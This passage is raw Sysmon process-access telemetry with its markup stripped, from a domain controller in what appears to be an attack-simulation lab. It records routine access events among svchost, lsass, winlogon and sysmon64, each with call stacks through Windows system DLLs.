:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002812Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.282{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002811Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.282{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002810Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.282{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002809Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.282{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002808Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.282{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002807Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.282{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002806Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.282{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002805Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.282{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002804Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.204{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002803Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.204{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002802Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.204{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002801Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.188{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1700-00000000A301}1632C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002800Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.188{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002799Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.188{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+b4ff|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002798Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.188{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002797Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.188{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002796Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.188{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002795Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.188{59A5CD1D-8E46-6005-1600-00000000A301}15441744C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+4689|c:\windows\system32\themeservice.dll+3fdd|c:\windows\system32\themeservice.dll+3c53|c:\windows\system32\themeservice.dll+2675|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002794Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.188{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002793Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.188{59A5CD1D-8E46-6005-1600-00000000A301}15441956C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x147aC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\themeservice.dll+3de3|c:\windows\system32\themeservice.dll+26c0|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002792Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.188{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002791Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.188{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002790Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.188{59A5CD1D-8E46-6005-0C00-00000000A301}5964472C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002789Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.188{59A5CD1D-8E46-6005-0C00-00000000A301}5964472C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002788Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.188{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002787Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 